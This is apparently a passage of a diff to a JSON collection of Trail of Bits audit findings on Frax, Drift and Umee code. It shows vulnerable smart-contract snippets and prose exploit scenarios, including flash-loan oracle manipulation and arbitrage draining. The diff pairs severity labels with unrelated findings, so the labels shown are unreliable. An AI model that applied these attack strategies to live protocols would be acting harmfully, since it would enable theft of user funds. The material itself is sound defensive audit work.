- "title": "6. spotPriceOHM is vulnerable to manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The OHM_AMO contract uses the Uniswap V2 spot price to calculate the value of the collateral that it holds. This price can be manipulated by making a large trade through the OHM-FRAX pool. An attacker can manipulate the apparent value of collateral and thereby change the collateralization rate at will. FraxPoolV3 appears to contain the most funds at risk, but any contract that uses FRAX.globalCollateralValue is susceptible to a similar attack. (It looks like Pool_USDC has buybacks paused, so it should not be able to burn FXS, at the time of writing.) function spotPriceOHM () public view returns ( uint256 frax_per_ohm_raw , uint256 frax_per_ohm ) { ( uint256 reserve0 , uint256 reserve1 , ) = (UNI_OHM_FRAX_PAIR.getReserves()); // OHM = token0, FRAX = token1 frax_per_ohm_raw = reserve1.div(reserve0); frax_per_ohm = reserve1.mul(PRICE_PRECISION).div(reserve0.mul( 10 ** missing_decimals_ohm)); } Figure 6.1: old_contracts/Misc_AMOs/OHM_AMO.sol#L174-L180 FRAX.globalCollateralValue loops through frax_pools_array , including OHM_AMO , and aggregates collatDollarBalance . The collatDollarBalance for OHM_AMO is calculated using spotPriceOHM and thus is vulnerable to manipulation. function globalCollateralValue() public view returns ( uint256 ) { uint256 total_collateral_value_d18 = 0 ; for ( uint i = 0 ; i < frax_pools_array.length; i++){ // Exclude null addresses if (frax_pools_array[i] != address ( 0 )){ total_collateral_value_d18 = total_collateral_value_d18.add(FraxPool(frax_pools_array[i]).collatDollarBalance()); } } return total_collateral_value_d18; } Figure 6.2: contracts/Frax/Frax.sol#L180-L191 buyBackAvailableCollat returns the amount the protocol will buy back if the aggregate value of collateral appears to back each unit of FRAX with more than is required by the current collateral ratio. Since globalCollateralValue is manipulable, the protocol can be artificially forced into buying (burning) FXS shares and paying out collateral. function buybackAvailableCollat () public view returns ( uint256 ) { uint256 total_supply = FRAX.totalSupply(); uint256 global_collateral_ratio = FRAX.global_collateral_ratio(); uint256 global_collat_value = FRAX.globalCollateralValue(); if (global_collateral_ratio > PRICE_PRECISION) global_collateral_ratio = PRICE_PRECISION; // Handles an overcollateralized contract with CR > 1 uint256 required_collat_dollar_value_d18 = (total_supply.mul(global_collateral_ratio)).div(PRICE_PRECISION); // Calculates collateral needed to back each 1 FRAX with $1 of collateral at current collat ratio if (global_collat_value > required_collat_dollar_value_d18) { // Get the theoretical buyback amount uint256 theoretical_bbk_amt = global_collat_value.sub(required_collat_dollar_value_d18); // See how much has collateral has been issued this hour uint256 current_hr_bbk = bbkHourlyCum[curEpochHr()]; // Account for the throttling return comboCalcBbkRct(current_hr_bbk, bbkMaxColE18OutPerHour, theoretical_bbk_amt); } else return 0 ; } Figure 6.3: contracts/Frax/Pools/FraxPoolV3.sol#L284-L303 buyBackFxs calculates the amount of FXS to burn from the user, calls burn on the FRAXShares contract, and sends the caller an equivalent dollar amount in USDC.
function buyBackFxs ( uint256 col_idx , uint256 fxs_amount , uint256 col_out_min ) external collateralEnabled(col_idx) returns ( uint256 col_out ) { require (buyBackPaused[col_idx] == false , \"Buyback is paused\" ); uint256 fxs_price = getFXSPrice(); uint256 available_excess_collat_dv = buybackAvailableCollat(); // If the total collateral value is higher than the amount required at the current collateral ratio then buy back up to the possible FXS with the desired collateral require (available_excess_collat_dv > 0 , \"Insuf Collat Avail For BBK\" ); // Make sure not to take more than is available uint256 fxs_dollar_value_d18 = fxs_amount.mul(fxs_price).div(PRICE_PRECISION); require (fxs_dollar_value_d18 <= available_excess_collat_dv, \"Insuf Collat Avail For BBK\" ); // Get the equivalent amount of collateral based on the market value of FXS provided uint256 collateral_equivalent_d18 = fxs_dollar_value_d18.mul(PRICE_PRECISION).div(collateral_prices[col_idx]); col_out = collateral_equivalent_d18.div( 10 ** missing_decimals[col_idx]); // In its natural decimals() // Subtract the buyback fee col_out = (col_out.mul(PRICE_PRECISION.sub(buyback_fee[col_idx]))).div(PRICE_PRECISION); // Check for slippage require (col_out >= col_out_min, \"Collateral slippage\" ); // Take in and burn the FXS, then send out the collateral FXS.pool_burn_from( msg.sender , fxs_amount); TransferHelper.safeTransfer(collateral_addresses[col_idx], msg.sender , col_out); // Increment the outbound collateral, in E18, for that hour // Used for buyback throttling bbkHourlyCum[curEpochHr()] += collateral_equivalent_d18; } Figure 6.4: contracts/Frax/Pools/FraxPoolV3.sol#L488-L517 recollateralize takes collateral from a user and gives the user an equivalent amount of FXS, including a bonus. Currently, the bonus_rate is set to 0 , but a nonzero bonus_rate would significantly increase the profitability of an attack.
// When the protocol is recollateralizing, we need to give a discount of FXS to hit the new CR target // Thus, if the target collateral ratio is higher than the actual value of collateral, minters get FXS for adding collateral // This function simply rewards anyone that sends collateral to a pool with the same amount of FXS + the bonus rate // Anyone can call this function to recollateralize the protocol and take the extra FXS value from the bonus rate as an arb opportunity function recollateralize( uint256 col_idx, uint256 collateral_amount, uint256 fxs_out_min) external collateralEnabled(col_idx) returns ( uint256 fxs_out) { require (recollateralizePaused[col_idx] == false , \"Recollat is paused\" ); uint256 collateral_amount_d18 = collateral_amount * ( 10 ** missing_decimals[col_idx]); uint256 fxs_price = getFXSPrice(); // Get the amount of FXS actually available (accounts for throttling) uint256 fxs_actually_available = recollatAvailableFxs(); // Calculated the attempted amount of FXS fxs_out = collateral_amount_d18.mul(PRICE_PRECISION.add(bonus_rate).sub(recollat_fee[col_idx])).div(fxs_price); // Make sure there is FXS available require (fxs_out <= fxs_actually_available, \"Insuf FXS Avail For RCT\" ); // Check slippage require (fxs_out >= fxs_out_min, \"FXS slippage\" ); // Don't take in more collateral than the pool ceiling for this token allows require (freeCollatBalance(col_idx).add(collateral_amount) <= pool_ceilings[col_idx], \"Pool ceiling\" ); // Take in the collateral and pay out the FXS TransferHelper.safeTransferFrom(collateral_addresses[col_idx], msg.sender , address ( this ), collateral_amount); FXS.pool_mint( msg.sender , fxs_out); // Increment the outbound FXS, in E18 // Used for recollat throttling rctHourlyCum[curEpochHr()] += fxs_out ; } Figure 6.5: contracts/Frax/Pools/FraxPoolV3.sol#L519-L550 Exploit Scenario FraxPoolV3.bonus_rate is nonzero. Using a flash loan, an attacker buys OHM with FRAX, drastically increasing the spot price of OHM. When FraxPoolV3.buyBackFXS is called, the protocol incorrectly determines that FRAX has gained additional collateral. This causes the pool to burn FXS shares and to send the attacker USDC of the equivalent dollar value. The attacker moves the price in the opposite direction and calls recollateralize on the pool, receiving and selling newly minted FXS, including a bonus, for profit. This attack can be carried out until the buyback and recollateralize hourly cap, currently 200,000 units, is reached. Recommendations Short term, take one of the following steps to mitigate this issue: Call FRAX.removePool and remove OHM_AMO . Note, this may cause the protocol to become less collateralized. Call FraxPoolV3.setBbkRctPerHour and set bbkMaxColE18OutPerHour and rctMaxFxsOutPerHour to 0 . Calling toggleMRBR to pause USDC buybacks and recollateralizations would have the same effect. The implications of this mitigation on the long-term sustainability of the protocol are not clear. Long term, do not use the spot price to determine collateral value. Instead, use a time-weighted average price (TWAP) or an oracle such as Chainlink. If a TWAP is used, ensure that the underlying pool is highly liquid and not easily manipulated. Additionally, create a rigorous process to onboard collateral since an exploit of this nature could destabilize the system. References samczsun, \"So you want to use a price oracle\" euler-xyz/uni-v3-twap-manipulation",
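The TWAP recommended above can be sketched in a few lines; the following Go sketch is illustrative only (not Frax or Uniswap code) and assumes Uniswap V2-style cumulative-price observations as inputs:

    package main

    import "fmt"

    // observation is a (timestamp, cumulativePrice) pair, where
    // cumulativePrice is the running sum of price * secondsElapsed, as
    // Uniswap V2-style price accumulators expose it.
    type observation struct {
        timestamp       int64
        cumulativePrice uint64
    }

    // twap derives the time-weighted average price between two
    // observations. A single end-of-block trade moves the spot price but
    // barely moves this average when the window is long, which is what
    // makes a TWAP harder to manipulate than a getReserves() spot price.
    func twap(a, b observation) uint64 {
        return (b.cumulativePrice - a.cumulativePrice) / uint64(b.timestamp-a.timestamp)
    }

    func main() {
        start := observation{timestamp: 0, cumulativePrice: 0}
        // 3,600 seconds at an average price of 25 -> accumulator of 90,000.
        end := observation{timestamp: 3600, cumulativePrice: 90_000}
        fmt.Println(twap(start, end)) // 25
    }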
+ "title": "16. Inconsistent use of integer types ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol codebase uses integer types inconsistently; data of similar kinds is represented using differently sized types or types with different signedness. Conversions from one integer type to another present an opportunity for the contracts to fail and should be avoided. For example, the pow method expects a u32 argument. However, in some places u128 values must be cast to u32 values, even though those values are intended to be used as exponents (figures 16.1, 16.2, and 16.3). let expo_diff = (spot_market.insurance_fund.shares_base - insurance_fund_stake.if_base) .cast::<u32>()?; let rebase_divisor = 10_u128.pow(expo_diff); Figure 16.1: programs/drift/src/controller/insurance.rs#L154-L157 #[zero_copy] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct InsuranceFund { pub vault: Pubkey , pub total_shares: u128 , pub user_shares: u128 , pub shares_base: u128 , // exponent for lp shares (for rebasing) pub unstaking_period: i64 , // if_unstaking_period pub last_revenue_settle_ts: i64 , pub revenue_settle_period: i64 , pub total_factor: u32 , // percentage of interest for total insurance pub user_factor: u32 , // percentage of interest for user staked insurance } Figure 16.2: programs/drift/src/state/spot_market.rs#L352-L365 #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct InsuranceFundStake { pub authority: Pubkey , if_shares: u128 , pub last_withdraw_request_shares: u128 , // get zero as 0 when not in escrow pub if_base: u128 , // exponent for if_shares decimal places (for rebase) pub last_valid_ts: i64 , pub last_withdraw_request_value: u64 , pub last_withdraw_request_ts: i64 , pub cost_basis: i64 , pub market_index: u16 , pub padding: [ u8 ; 14 ], } Figure 16.3: programs/drift/src/state/insurance_fund_stake.rs#L10-L24 The following command reveals 689 locations where the cast method appears to be used: grep -r -I '\\.cast\\>' programs/drift Each such use could lead to a denial of service if an attacker puts the contract into a state where the cast always errors. Many of these uses could be eliminated by more consistent use of integer types. Note that Drift Protocol has indicated that some of the observed inconsistencies are related to reducing rent costs. Exploit Scenario Mallory manages to put the contract into a state such that one of the nearly 700 uses of cast always returns an error. The contract becomes unusable for Alice, who needs to execute a code path involving the vulnerable cast . Recommendations Short term, review all uses of cast to see which might be eliminated by changing the types of the operands. This will reduce the overall number of casts and reduce the likelihood that one could lead to denial of service. Long term, as new code is introduced into the codebase, review the types used to hold similar kinds of data. This will reduce the likelihood that new casts are needed.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, {
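Drift's cast helper is a checked narrowing conversion; the Go sketch below (illustrative only; Drift itself is written in Rust) shows why every such conversion is a latent failure path, which is the reason the recommendation favors removing avoidable conversions through consistent typing rather than merely checking them:

    package main

    import (
        "errors"
        "fmt"
        "math"
    )

    // toUint32 narrows a uint64 to uint32, returning an error instead of
    // silently wrapping. Each call site like this can fail at runtime,
    // so every avoidable one is an avoidable denial-of-service path.
    func toUint32(v uint64) (uint32, error) {
        if v > math.MaxUint32 {
            return 0, errors.New("value does not fit in uint32")
        }
        return uint32(v), nil
    }

    func main() {
        if _, err := toUint32(1 << 40); err != nil {
            fmt.Println(err) // value does not fit in uint32
        }
    }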
- "title": "7. Return values of the Chainlink oracle are not validated ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is a positive integer. An overflow (e.g., uint(-1) ) would drastically misrepresent the price and cause unexpected behavior. In addition, FraxPoolV3 does not validate the completion and recency of the round data, permitting stale price data that does not reflect recent changes. function getFRAXPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFRAXUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_frax_usd_decimals); } function getFXSPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFXSUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_fxs_usd_decimals); } Figure 7.1: contracts/Frax/Pools/FraxPoolV3.sol#231-239 An older version of Chainlink's oracle interface has a similar function, latestAnswer . When this function is used, the return value should be checked to ensure that it is a positive integer. However, round information does not need to be checked because latestAnswer returns only price data. Recommendations Short term, add a check to latestRoundData and similar functions to verify that values are non-negative before converting them to unsigned integers, and add an invariant that checks that the round has finished and that the price data is from the current round: require(updatedAt != 0 && answeredInRound == roundID) . Long term, define a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) . Furthermore, use consistent interfaces instead of mixing different versions. References Chainlink AggregatorV3Interface",
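The round checks recommended above amount to a handful of guard clauses; a minimal Go sketch of the same validation logic follows (illustrative only, since the contracts are Solidity; the field names mirror Chainlink's latestRoundData tuple, and the one-hour freshness threshold is an assumed policy value):

    package main

    import (
        "errors"
        "fmt"
        "time"
    )

    // roundData mirrors the tuple returned by Chainlink's latestRoundData.
    type roundData struct {
        roundID         uint64
        answer          int64 // signed: must be checked before unsigned use
        updatedAt       int64 // unix seconds; zero means the round never completed
        answeredInRound uint64
    }

    const maxPriceAge = 3600 // assumed freshness threshold, in seconds

    // validate applies the short- and long-term recommendations: a
    // positive answer, a completed round, an answer from the current
    // round, and a bounded age.
    func validate(r roundData, now int64) error {
        switch {
        case r.answer <= 0:
            return errors.New("non-positive price")
        case r.updatedAt == 0:
            return errors.New("round not complete")
        case r.answeredInRound != r.roundID:
            return errors.New("stale round")
        case now-r.updatedAt > maxPriceAge:
            return errors.New("price too old")
        }
        return nil
    }

    func main() {
        now := time.Now().Unix()
        r := roundData{roundID: 7, answer: 100, updatedAt: now, answeredInRound: 7}
        fmt.Println(validate(r, now)) // <nil>
    }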
+ "title": "17. Use of opaque constants in tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Several of the Drift Protocol tests use constants with no explanation for how they were derived, which makes it difficult to assess whether the tests are functioning correctly. Ten examples appear in figure 17.1. In each case, a variable or field is compared against a constant consisting of 6-12 random-looking digits. Without an explanation for how these digits were obtained, it is difficult to tell whether the constant expresses the correct value. assert_eq! (user.spot_positions[ 0 ].scaled_balance, 45558159000 ); assert_eq! (user.spot_positions[ 1 ].scaled_balance, 406768999 ); ... assert_eq! (margin_requirement, 44744590 ); assert_eq! (total_collateral, 45558159 ); assert_eq! (margin_requirement_plus_buffer, 45558128 ); ... assert_eq! (token_amount, 406769 ); assert_eq! (token_value, 40676900 ); assert_eq! (strict_token_value_1, 4067690 ); // if oracle price is more favorable than twap ... assert_eq! (liquidator.spot_positions[ 0 ].scaled_balance, 159441841000 ); ... assert_eq! (liquidator.spot_positions[ 1 ].scaled_balance, 593824001 ); Figure 17.1: programs/drift/src/controller/liquidation/tests.rs#L1618-L1687 Exploit Scenario Mallory discovers that a constant used in a Drift Protocol test was incorrectly derived and that the tests were actually verifying incorrect behavior. Mallory uses the bug to siphon funds from the Drift Protocol exchange. Recommendations Short term, where possible, compute values using an explicit formula rather than an opaque constant. If using an explicit formula is not possible, include a comment explaining how the constant was derived. This will help to ensure that correct behavior is being tested for. Moreover, the process of giving such explicit formulas could reveal errors. Long term, write scripts to identify constants with high entropy, and run those scripts as part of your CI process. This will help to ensure the aforementioned standards are maintained.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2432,99 +5190,99 @@ ] }, { - "title": "8. Unlimited arbitrage in CCFrax1to1AMM ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The CCFrax1to1AMM contract implements an automated market maker (AMM) with a constant price and zero slippage. It is a constant sum AMM that maintains the invariant k = x + y, where x and y are the token balances; k must remain constant during swaps (ignoring fees). Constant sum AMMs are impractical because they are vulnerable to unlimited arbitrage. If the price difference of the AMM's tokens in external markets is large enough, the most profitable arbitrage strategy is to buy the total reserve of the more expensive token from the AMM, leaving the AMM entirely imbalanced. Other AMMs like Uniswap and Curve prevent unlimited arbitrage by making the price depend on the reserves. This limits profits from arbitrage to a fraction of the total reserves, as the price will eventually reach a point at which the arbitrage opportunity disappears. No such limit exists in the CCFrax1to1AMM contract. While arbitrage opportunities are somewhat limited by the token caps, fees, and gas prices, unlimited arbitrage is always possible once the reserves or the difference between the FRAX price and the token price becomes large enough. While token_price swings are limited by the price_tolerance parameter, frax_price swings are not limited. Exploit Scenario The CCFrax1to1AMM contract is deployed, and price_tolerance is set to 0.005. A token is whitelisted with a token_cap of 100,000 and a swap_fee of 0.0004. A user transfers 100,000 FRAX to the AMM. The price of the token in an external market becomes 0.995, the minimum at which the AMM allows swaps, and the price of FRAX in an external market becomes 1.005. Alice buys (or takes out a flash loan of) $100,000 worth of the token in the external market. Alice swaps all of her tokens for FRAX with the AMM and then sells all of her FRAX in the external market, making a profit of $960. No FRAX remains in the AMM. This scenario is conservative, as it assumes a balance of only 100,000 FRAX and a frax_price of 1.005. As frax_price and the balance increase, the arbitrage profit increases. Recommendations Short term, do not deploy CCFrax1to1AMM and do not fund any existing deployments with significant amounts. Those funds will be at risk of being drained through arbitrage. Long term, when providing stablecoin-to-stablecoin liquidity, use a Curve pool or another proven and audited implementation of the stableswap invariant.",
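The economics of the exploit scenario can be checked with a few lines of arithmetic; the Go snippet below reproduces the scenario's numbers under its stated assumptions (0.995/1.005 external prices, a 0.0004 swap fee, and a 100,000 FRAX reserve):

    package main

    import "fmt"

    func main() {
        const (
            reserveFRAX = 100_000.0 // FRAX held by the constant-sum AMM
            swapFee     = 0.0004    // per-swap fee taken by the AMM
            tokenPrice  = 0.995     // external market price of the token
            fraxPrice   = 1.005     // external market price of FRAX
        )

        // Tokens Alice must feed the AMM (at a fixed 1:1 rate, plus fee)
        // to drain its entire FRAX reserve.
        tokensIn := reserveFRAX / (1 - swapFee)

        cost := tokensIn * tokenPrice      // buy the tokens externally
        revenue := reserveFRAX * fraxPrice // sell all drained FRAX externally

        fmt.Printf("profit: $%.0f\n", revenue-cost) // profit: $960
    }

Because the AMM's rate never moves against the trader, nothing in this calculation limits the position size except the reserve itself, which is the unlimited-arbitrage property the finding describes.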
+ "title": "18. Accounts from contexts are not always used by the instruction ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The context definition for the initialize instruction defines a drift_signer account. However, this account is not used by the instruction. It appears to be a remnant used to pass the address of the state PDA account; however, the need to do this was eliminated by the use of find_program_address to calculate the address. Also, in the initialize_insurance_fund_stake instruction, the spot_market , user_stats , and state accounts from the context are not used by the instruction. #[derive(Accounts)] pub struct Initialize <'info> { #[account(mut)] pub admin: Signer <'info>, #[account( init, seeds = [b \"drift_state\" .as_ref()], space = std::mem::size_of::<State>() + 8, bump, payer = admin )] pub state: Box<Account<'info, State>>, pub quote_asset_mint: Box<Account<'info, Mint>>, /// CHECK: checked in `initialize` pub drift_signer: AccountInfo <'info>, pub rent: Sysvar <'info, Rent>, pub system_program: Program <'info, System>, pub token_program: Program <'info, Token>, } Figure 18.1: programs/drift/src/instructions/admin.rs#L1989-L2007 Exploit Scenario Alice, a Drift Protocol developer, assumes that the drift_signer account is used by the instruction, and she uses a different address for the account, expecting this account to hold the contract state after the initialize instruction has been called. Recommendations Short term, remove the unused account from the context. This eliminates the possibility of confusion around the use of the accounts. Long term, employ a process where a refactoring of an instruction's code is followed by a review of the corresponding context definition. This ensures that the context is in sync with the instruction handlers.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "9. Collateral prices are assumed to always be $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "In the FraxPoolV3 contract, the setCollateralPrice function sets collateral prices and stores them in the collateral_prices mapping. As of December 13, 2021, collateral prices are set to $1 for all collateral types in the deployed version of the FraxPoolV3 contract. Currently, only stablecoins are used as collateral within the Frax Protocol. For those stablecoins, $1 is an appropriate price approximation, at most times. However, when the actual price of the collateral differs enough from $1, users could choose to drain value from the protocol through arbitrage. Conversely, during such price fluctuations, other users who are not aware that FraxPoolV3 assumes collateral prices are always $1 can receive less value than expected. Collateral tokens that are not pegged to a specific value, like ETH or WBTC, cannot currently be used safely within FraxPoolV3 . Their prices are too volatile, and repeatedly calling setCollateralPrice is not a feasible solution to keeping their prices up to date. Exploit Scenario The price of FEI, one of the stablecoins collateralizing the Frax Protocol, changes to $0.99. Alice, a user, can still mint FRAX/FXS as if the price of FEI were $1. Ignoring fees, Alice can buy 1 million FEI for $990,000, mint 1 million FRAX/FXS with the 1 million FEI, and sell the 1 million FRAX/FXS for $1 million, making $10,000 in the process. As a result, the Frax Protocol loses $10,000. If the price of FEI changes to $1.01, Bob would expect that he can exchange his 1 million FEI for 1.01 million FRAX/FXS. Since FraxPoolV3 is not aware of the actual price of FEI, Bob receives only 1 million FRAX/FXS, incurring a 1% loss. Recommendations Short term, document the arbitrage opportunities described above. Warn users that they could lose funds if collateral prices differ from $1. Disable the option to set collateral prices to values not equal to $1. Long term, modify the FraxPoolV3 contract so that it fetches collateral prices from a price oracle.",
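The exploit arithmetic in the FEI example above can be checked directly; this small Go snippet reproduces the scenario's numbers (the prices and amounts are exactly those stated in the scenario):

    package main

    import "fmt"

    func main() {
        const (
            feiPrice  = 0.99      // actual market price of FEI
            feiAmount = 1_000_000 // FEI bought and used to mint FRAX/FXS
        )

        cost := feiAmount * feiPrice // $990,000 to acquire the FEI
        // FraxPoolV3 values the FEI at $1, so 1,000,000 FRAX/FXS are
        // minted and sold for $1,000,000 (fees ignored, as in the scenario).
        proceeds := float64(feiAmount) * 1.0

        fmt.Printf("protocol loss: $%.0f\n", proceeds-cost) // protocol loss: $10000
    }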
+ "title": "19. Unaligned references are allowed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol codebase uses the #![allow(unaligned_references)] attribute. This allows the use of unaligned references throughout the program and could mask serious problems in future updates to the contract. #![allow(clippy::too_many_arguments)] #![allow(unaligned_references)] #![allow(clippy::bool_assert_comparison)] #![allow(clippy::comparison_chain)] Figure 19.1: programs/drift/src/lib.rs#L1-L4 Exploit Scenario Alice, a Drift Protocol developer, accidentally introduces errors caused by the use of unaligned references, affecting the contract operation and leading to a loss of funds. Recommendations Short term, remove the attributes. This ensures that the check for unaligned references correctly flags such cases. Long term, be conservative with the use of attributes used to suppress warnings or errors throughout the codebase. If possible, apply them to only the minimum possible amount of code. This minimizes the risk of problems stemming from the suppressed checks.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "10. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Frax Finance has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Frax Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { + "title": "20. Size of created accounts derived from in-memory representation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "When state accounts are initialized, the size of the account is set to std::mem::size_of::<T>() + 8 , where the eight extra bytes are used for the discriminator. The structs for the state types all have a trailing field with padding, seemingly to ensure the account size is aligned to eight bytes and to determine the size of the account.
In other places, the code relies on the size_of function to determine the type of accounts passed to the instruction. While we could not find any security-related problem with the scheme today, this does mean that every account's in-memory representation is inflated by the amount of padding, which could become a problem with respect to the limitation of the stack or heap size. Furthermore, if any of the accounts are updated in such a way that the repr(C) layout size differs from the Anchor space reference , it could cause a problem. For example, if the SpotMarket struct is changed so that its in-memory representation is smaller than the required Anchor size, the initialize_spot_market instruction would fail because the created account would be too small to hold the serialized representation of the data. #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey , pub whitelist_mint: Pubkey , pub discount_mint: Pubkey , pub signer: Pubkey , pub srm_vault: Pubkey , pub perp_fee_structure: FeeStructure , pub spot_fee_structure: FeeStructure , pub oracle_guard_rails: OracleGuardRails , pub number_of_authorities: u64 , pub number_of_sub_accounts: u64 , pub lp_cooldown_time: u64 , pub liquidation_margin_buffer_ratio: u32 , pub settlement_duration: u16 , pub number_of_markets: u16 , pub number_of_spot_markets: u16 , pub signer_nonce: u8 , pub min_perp_auction_duration: u8 , pub default_market_order_time_in_force: u8 , pub default_spot_auction_duration: u8 , pub exchange_status: ExchangeStatus , pub padding : [ u8 ; 17 ], } Figure 20.1: The State struct, with corresponding padding #[account( init, seeds = [b \"drift_state\" .as_ref()], space = std::mem::size_of::<State>() + 8 , bump, payer = admin )] pub state: Box<Account<'info, State>>, Figure 20.2: The creation of the State account, using the in-memory size if data.len() < std::mem::size_of::<T>() + 8 { return Ok (( None , None )); } Figure 20.3: An example of the in-memory size used to determine the account type Exploit Scenario Alice, a Drift Protocol developer, unaware of the implicit requirements of the in-memory size, makes changes to a state account's structure or adds a state account structure such that the in-memory size is smaller than the size needed for the serialized data. As a result, instructions in the contract that save data to the account will fail. Recommendations Short term, add an implementation to each state struct that returns the size to be used for the corresponding Solana account. This avoids the overhead of the padding and removes the dependency on assumptions about the in-memory size. Long term, avoid relying on assumptions about the in-memory representation of types within programs created in Rust. This ensures that changes to the representation do not affect the program's operation.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "11. Users are unable to limit the amount of collateral paid to FraxPoolV3 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The amount of collateral and FXS that is paid by the user in mintFrax is dynamically computed from the collateral ratio and price. These parameters can change between transaction creation and transaction execution. Users currently have no way to ensure that the paid amounts are still within acceptable limits at the time of transaction execution. Exploit Scenario Alice wants to call mintFrax .
In the time between when the transaction is broadcast and executed, the global collateral ratio, collateral, and/or FXS prices change in such a way that Alice's minting operation is no longer profitable for her. The minting operation is still executed, and Alice loses funds. Recommendations Short term, add the maxCollateralIn and maxFXSIn parameters to mintFrax , enabling users to make the transaction revert if the amount of collateral and FXS that they would have to pay is above acceptable limits. Long term, always add such limits to give users the ability to prevent unacceptably large input amounts and unacceptably small output amounts when those amounts are dynamically computed.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { + "title": "1. Integer overflow in Peggo's deploy-erc20-raw command ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The denom-decimals argument of the deploy-erc20-raw command (in the deployERC20RawCmd function) may experience an integer overflow. The argument is first parsed into a value of the int type by the strconv.Atoi function and then cast to a value of the uint8 type (figure 1.1). If the denom-decimals argument with which deploy-erc20-raw is invoked is a negative value or a value that is too large, the casting operation will cause an overflow; however, the user will not receive an error, and the execution will proceed with the overflowed value. func deployERC20RawCmd() *cobra.Command { return &cobra.Command{ Use: \"deploy-erc20-raw [gravity-addr] [denom-base] [denom-name] [denom-symbol] [denom-decimals]\" , /* (...) */ , RunE: func (cmd *cobra.Command, args [] string ) error { denomDecimals, err := strconv.Atoi(args[ 4 ]) if err != nil { return fmt.Errorf( \"invalid denom decimals: %w\" , err) } tx, err := gravityContract.DeployERC20(auth, denomBase, denomName, denomSymbol, uint8 (denomDecimals) ) Figure 1.1: peggo/cmd/peggo/bridge.go#L348-L353 We identified this issue by running CodeQL's IncorrectIntegerConversionQuery.ql query. Recommendations Short term, fix the integer overflow in Peggo's deployERC20RawCmd function by using the strconv.ParseUint function to parse the denom-decimals argument. To do this, use the patch in figure 1.2. diff --git a/cmd/peggo/bridge.go b/cmd/peggo/bridge.go index 49aabc5..4b3bc6a 100644 --- a/cmd/peggo/bridge.go +++ b/cmd/peggo/bridge.go @@ -345,7 +345,7 @@ network starting.`, denomBase := args[ 1 ] denomName := args[ 2 ] denomSymbol := args[ 3 ] - denomDecimals, err := strconv.Atoi(args[ 4 ]) + denomDecimals, err := strconv.ParseUint(args[ 4 ], 10 , 8 ) if err != nil { return fmt.Errorf( \"invalid denom decimals: %w\" , err) } Figure 1.2: A patch for the integer overflow issue in Peggo's deploy-erc20-raw command Long term, integrate CodeQL into the CI/CD pipeline to find similar issues in the future.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, {
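The overflow in the Peggo finding above is easy to reproduce in isolation; the following standalone Go snippet shows the unchecked strconv.Atoi-plus-cast behavior next to the recommended strconv.ParseUint approach (the value 300 is an arbitrary out-of-range example):

    package main

    import (
        "fmt"
        "strconv"
    )

    func main() {
        arg := "300" // out of range for uint8 (0-255)

        // Unchecked: Atoi succeeds, and the uint8 cast silently wraps to 44.
        n, _ := strconv.Atoi(arg)
        fmt.Println(uint8(n)) // 44

        // Checked: ParseUint with bitSize 8 rejects the value outright.
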